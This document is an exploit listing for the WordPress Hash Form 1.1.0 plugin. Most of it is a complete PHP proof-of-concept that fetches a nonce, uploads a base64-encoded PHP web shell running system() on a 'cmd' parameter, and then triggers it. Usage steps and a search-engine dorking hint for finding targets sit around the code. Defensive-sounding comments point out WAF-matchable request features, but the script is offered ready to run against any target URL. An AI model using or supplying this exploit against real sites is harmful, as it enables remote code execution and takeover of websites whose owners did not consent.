
WordPress Hash Form 1.1.0 Code Injection

🗓️ 03 Oct 2024 00:00:00Reported by indoushkaType 
packetstorm

WordPress Hash Form 1.1.0 Code Injection Vulnerability allows upload and execution of a PHP shell

Code
`=============================================================================================================================================  
| # Title : WordPress Hash Form 1.1.0 php code injection Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |  
| # Vendor : https://plugintests.com/plugins/wporg/hash-form/latest |  
=============================================================================================================================================  
  
POC :  
  
[+] Dorking in Google or other search engines.  
  
[+] The following PHP code uploads a shell file from an external link.  
  
[+] Line 117 set your target.  
  
[+] Line 111 set your commands.  
  
[+] save code as poc.php .  
  
[+] Usage : cmd = php poc.php .  
  
[+] PayLoad :  
  
<?php  
  
// Proof-of-concept client for the reported Hash Form 1.1.0 upload issue.  
// Defensive reading: every request below goes to /wp-admin/admin-ajax.php with  
// action `hashform_preview` (GET; fingerprinting and nonce retrieval) or  
// `hashform_file_upload_action` (POST; the upload). Those action names, a  
// client-supplied `allowedExtensions[0]=php` field and a `data` field carrying  
// base64 text are the request features a WAF rule or application-log review can  
// match on. The class reports nothing beyond echo/die and has no error handling.  
class WordPressHashFormRCE {  
// Base URL; every request is target_url . $uri (see sendRequest()).  
private $target_url;  
// Nonce captured from the preview response; set by exploit(), read by uploadPhpFile().  
private $nonce;  
  
// @param string $target_url  scheme + host, without trailing slash, since the  
// URIs passed to sendRequest() already begin with '/' and are concatenated as-is.  
public function __construct($target_url) {  
$this->target_url = $target_url;  
}  
  
// Fingerprints the target and returns a human-readable status string.  
// Note: checkPluginVersion() ignores both arguments passed here, so the  
// 'hash-form' / '1.1.1' values have no effect on the request it sends.  
// @return string  
public function check() {  
if (!$this->isWordPressOnline()) {  
return 'WordPress does not appear to be online.';  
}  
  
$plugin_version = $this->checkPluginVersion('hash-form', '1.1.1');  
  
if ($plugin_version === null) {  
return 'Hash Form plugin does not appear to be installed.';  
}  
  
if ($plugin_version === false) {  
return 'Hash Form plugin is installed but the version is unknown.';  
}  
  
if ($plugin_version !== '1.1.0') {  
return "Hash Form plugin is version: $plugin_version, which is not vulnerable.";  
}  
  
return "Detected Hash Form plugin version: $plugin_version";  
}  
  
// Runs the chain nonce -> upload -> GET of the uploaded file.  
// Aborts the whole script with die() on the first failure instead of returning,  
// so a caller cannot recover from or log the failure itself.  
// @return void  
public function exploit() {  
echo "Attempting to retrieve nonce from the target...\n";  
$this->nonce = $this->getNonce();  
  
if (!$this->nonce) {  
die('Failed to retrieve the nonce necessary for file upload.');  
}  
  
echo "Nonce retrieved: {$this->nonce}\n";  
echo "Uploading PHP payload using the retrieved nonce...\n";  
  
$file_url = $this->uploadPhpFile();  
if (!$file_url) {  
die('Failed to upload the PHP payload. Check file permissions and server settings.');  
}  
  
echo "PHP payload uploaded successfully to $file_url\n";  
$this->triggerPayload($file_url);  
}  
  
// "Online" means sendRequest() returned a body (not false) for the preview action.  
// sendRequest() uses file_get_contents() without ignore_errors, so a non-2xx HTTP  
// status also yields false here; "site down" and "action rejected" are conflated.  
// @return bool  
private function isWordPressOnline() {  
$response = $this->sendRequest('GET', '/wp-admin/admin-ajax.php?action=hashform_preview&form=1');  
return $response !== false;  
}  
  
// Pulls a "version":"..." value out of the preview response with a regex.  
// $plugin_name and $version are unused; the request is identical to the one in  
// isWordPressOnline().  
// @return string|false|null  null = no response, false = no version matched,  
//                            otherwise the captured string  
private function checkPluginVersion($plugin_name, $version) {  
$response = $this->sendRequest('GET', "/wp-admin/admin-ajax.php?action=hashform_preview&form=1");  
if ($response === false) return null;  
  
preg_match('/"version":"([^"]+)"/', $response, $matches);  
return $matches[1] ?? false; // return the version or false if not found  
}  
  
// Extracts the hex value of the "ajax_nounce" key (spelling as matched in the  
// response body) from the preview response.  
// @return string|null  null when the request failed or no key matched  
private function getNonce() {  
$response = $this->sendRequest('GET', '/wp-admin/admin-ajax.php?action=hashform_preview&form=1');  
if ($response === false) return null;  
  
preg_match('/"ajax_nounce":"([a-f0-9]+)"/', $response, $matches);  
return $matches[1] ?? null;  
}  
  
// POSTs the base64 payload as the `data` form field under a random 8-hex-char .php  
// name, with the allowed-extension list supplied from the client side. Whether the  
// server honours that client list is the plugin-side question this PoC relies on;  
// nothing here verifies it. strtolower() is a no-op because bin2hex() already  
// returns lowercase. If sendRequest() returned false, json_decode() receives ''  
// (no strict_types in this file) and the method returns null.  
// @return string|null  the 'url' field of the JSON reply, or null  
private function uploadPhpFile() {  
$file_content = $this->createPayload();  
$file_name = strtolower(bin2hex(random_bytes(4))) . '.php';  
  
$response = $this->sendRequest('POST', '/wp-admin/admin-ajax.php', [  
'action' => 'hashform_file_upload_action',  
'file_uploader_nonce' => $this->nonce,  
'allowedExtensions[0]' => 'php',  
'sizeLimit' => 1048576,  
'qqfile' => $file_name,  
'data' => $file_content  
]);  
  
$json_response = json_decode($response, true);  
return $json_response['url'] ?? null;  
}  
  
// GETs $url through sendRequest(), which prepends target_url to it unchanged, so  
// the request goes to target_url . $url whatever form the upload reply's 'url'  
// field has. The response is discarded.  
// @param string $url  
// @return void  
private function triggerPayload($url) {  
echo "Triggering the payload...\n";  
$this->sendRequest('GET', $url);  
}  
  
// Thin file_get_contents() wrapper over a stream context. The form Content-Type  
// header and an http_build_query() body are sent for every method, including GET  
// with empty $data. The @ silences the warning, so the only failure signal callers  
// get is the false return; no HTTP status or error text is available.  
// @param string $method  
// @param string $uri   appended to target_url without normalisation  
// @param array  $data  form fields, urlencoded into the body  
// @return string|false  
private function sendRequest($method, $uri, $data = []) {  
$url = $this->target_url . $uri;  
$options = [  
'http' => [  
'header' => "Content-Type: application/x-www-form-urlencoded\r\n",  
'method' => $method,  
'content' => http_build_query($data),  
],  
];  
$context = stream_context_create($options);  
return @file_get_contents($url, false, $context);  
}  
  
// Builds the uploaded file content: a one-line PHP web shell that passes  
// $_GET['cmd'] to system(), returned base64-encoded. For incident response, the  
// decoded string is the on-disk content an integrity or malware scan would need to  
// recognise if the upload succeeded; whether the server base64-decodes the `data`  
// field before writing is not visible from this side.  
// @return string  base64 text  
private function createPayload() {  
// You can define your payload logic here, for now, we return a simple payload  
$payload = "<?php\n if(isset(\$_GET['cmd'])) { system(\$_GET['cmd']); }\n ?>";  
return base64_encode($payload);  
}  
}  
  
// Driver: instantiate the client with the author's placeholder target URL.  
$target_url = 'http://target-wordpress-site.com';  
$exploit = new WordPressHashFormRCE($target_url);  
  
// Fingerprint the target. The result is only printed; it does not gate the next call.  
echo $exploit->check() . "\n";  
  
// Run the upload chain unconditionally, even when check() reported "not vulnerable".  
$exploit->exploit();  
  
  
  
Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================  
`
